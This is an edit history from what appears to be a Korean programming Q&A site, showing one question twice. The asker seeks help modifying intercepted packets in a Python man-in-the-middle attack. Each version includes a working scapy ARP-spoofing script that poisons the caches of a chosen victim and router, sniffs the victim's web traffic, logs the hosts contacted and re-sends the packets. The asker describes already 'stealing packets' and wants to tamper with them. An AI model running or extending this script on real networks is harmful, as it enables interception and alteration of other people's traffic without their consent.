편집 기록

편집 기록
  • 프로필 정영훈님의 편집
    날짜2018.06.21

    python 중간자 공격에 따른 패킷 포워딩 구현


    현재 파이썬으로 중간자 공격을 해보려고 합니다

    중간자 공격을 해서 패킷을 훔치는 것 까지는 성공했는데 받은 패킷을 원래의 주소로 넘겨주는 방법을 잘 모르겠습니다

    물론 운영체제에서 지원하는 기능을 사용하면 된다는것은 알고있습니다 (예 sudo sysctl -w net.inet.ip.forwarding=1) 그러나 운영체제의 도움을 받으면 패킷을 수정해서 보낼 수 없었습니다

    저는 받은 패킷을 수정해서 보내주고 싶습니다 어떻게 하면 구현할 수 있을 까요?

    혹시 도움이 되시라고 소스코드도 올리도록 하겠습니다

    import subprocess
    import os
    import scapy.all
    import time
    import sys
    import threading
    
    victim_ip='0'
    ips=[]
    
    def select_victim():
        victim_ip=raw_input('Input victim IP')
        router_ip=raw_input('Input router IP')
        return (victim_ip, router_ip)
    
    def getMac(host):
        a=subprocess.Popen(["arp", "-a"], stdout=subprocess.PIPE)
        a=a.stdout.read().split('\n')[:-1]
        for i in a:
            tmp=i.split(' ')
            if host in tmp[1]:
                return tmp[3]
    
    def attack(victim_ip, router_ip):
        victim_mac=getMac(victim_ip)
        router_mac=getMac(router_ip)
        scapy.all.send(scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=victim_mac))
        scapy.all.send(scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=router_mac))
    
    def recover(victim_ip, router_ip):
        victim_mac=getMac(victim_ip)
        router_mac=getMac(router_ip)
        scapy.all.send(scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victim_mac), count=3)
        scapy.all.send(scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=router_mac), count=3)
    
    def pr(x):
        try:
            global victim_ip
            global ips
            print victim_ip
            with open('test.txt', 'at') as f:
                if x.haslayer(scapy.all.TCP):
                    if x['TCP'].sport == 80 or x['TCP'].dport == 80 or x['TCP'].sport == 443 or x['TCP'].dport == 443:
                        if x['IP'].src == victim_ip and not(str(x['IP'].dst) in ips):
                            f.write(str(x['IP'].dst)+' ')
                            ips.append(str(x['IP'].dst))
                        elif x['IP'].dst == victim_ip and not (str(x['IP'].src) in ips):
                            f.write(str(x['IP'].src)+' ')
                            ips.append(str(x['IP'].src))
                            x.show()
    
                scapy.all.sendp(x, iface='en0')
        except Exception, err:
            print err
            pass
    
    def sniffing():
        scapy.all.sniff(prn=pr)
    
    def main():
        #if os.geteuid() != 0:
        #    sys.exit("[!] Please run as root")
        IP=select_victim()
        global victim_ip
        victim_ip=IP[0]
        router_ip=IP[1]
    
        if getMac(router_ip) == None:
            print 'We can not find router mac address'
            return
    
        if getMac(victim_ip) == None:
            print 'we can not find victim mac address'
            return
    
        t=threading.Thread(target=sniffing)
        t.start()
    
    
        try:
            while True:
                print 'a'
                attack(victim_ip, router_ip)
                time.sleep(2)
        except Exception, err:
            print err
            recover(victim_ip, router_ip)
            t.join(10)
            exit()
    
    
    
    if __name__ == '__main__':
        with open('test.txt', 'rt') as f:
            ips=f.read().split(' ')
        main()
    
    
  • 프로필 Damotorie님의 편집
    날짜2016.08.29

    python 중간자 공격에 따른 패킷 포워딩 구현


    현재 파이썬으로 중간자 공격을 해보려고 합니다

    중간자 공격을 해서 패킷을 훔치는 것 까지는 성공했는데 받은 패킷을 원래의 주소로 넘겨주는 방법을 잘 모르겠습니다

    물론 운영체제에서 지원하는 기능을 사용하면 된다는것은 알고있습니다 (예 sudo sysctl -w net.inet.ip.forwarding=1) 그러나 운영체제의 도움을 받으면 패킷을 수정해서 보낼 수 없었습니다

    저는 받은 패킷을 수정해서 보내주고 싶습니다 어떻게 하면 구현할 수 있을 까요?

    혹시 도움이 되시라고 소스코드도 올리도록 하겠습니다

    import subprocess
    import os
    import scapy.all
    import time
    import sys
    import threading
    
    victim_ip='0'
    ips=[]
    
    def select_victim():
        victim_ip=raw_input('Input victim IP')
        router_ip=raw_input('Input router IP')
        return (victim_ip, router_ip)
    
    def getMac(host):
        a=subprocess.Popen(["arp", "-a"], stdout=subprocess.PIPE)
        a=a.stdout.read().split('\n')[:-1]
        for i in a:
            tmp=i.split(' ')
            if host in tmp[1]:
                return tmp[3]
    
    def attack(victim_ip, router_ip):
        victim_mac=getMac(victim_ip)
        router_mac=getMac(router_ip)
        scapy.all.send(scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=victim_mac))
        scapy.all.send(scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=router_mac))
    
    def recover(victim_ip, router_ip):
        victim_mac=getMac(victim_ip)
        router_mac=getMac(router_ip)
        scapy.all.send(scapy.all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victim_mac), count=3)
        scapy.all.send(scapy.all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=router_mac), count=3)
    
    def pr(x):
        try:
            global victim_ip
            global ips
            print victim_ip
            with open('test.txt', 'at') as f:
                if x.haslayer(scapy.all.TCP):
                    if x['TCP'].sport == 80 or x['TCP'].dport == 80 or x['TCP'].sport == 443 or x['TCP'].dport == 443:
                        if x['IP'].src == victim_ip and not(str(x['IP'].dst) in ips):
                            f.write(str(x['IP'].dst)+' ')
                            ips.append(str(x['IP'].dst))
                        elif x['IP'].dst == victim_ip and not (str(x['IP'].src) in ips):
                            f.write(str(x['IP'].src)+' ')
                            ips.append(str(x['IP'].src))
                            x.show()
    
                scapy.all.sendp(x, iface='en0')
        except Exception, err:
            print err
            pass
    
    def sniffing():
        scapy.all.sniff(prn=pr)
    
    def main():
        #if os.geteuid() != 0:
        #    sys.exit("[!] Please run as root")
        IP=select_victim()
        global victim_ip
        victim_ip=IP[0]
        router_ip=IP[1]
    
        if getMac(router_ip) == None:
            print 'We can not find router mac address'
            return
    
        if getMac(victim_ip) == None:
            print 'we can not find victim mac address'
            return
    
        t=threading.Thread(target=sniffing)
        t.start()
    
    
        try:
            while True:
                print 'a'
                attack(victim_ip, router_ip)
                time.sleep(2)
        except Exception, err:
            print err
            recover(victim_ip, router_ip)
            t.join(10)
            exit()
    
    
    
    if __name__ == '__main__':
        with open('test.txt', 'rt') as f:
            ips=f.read().split(' ')
        main()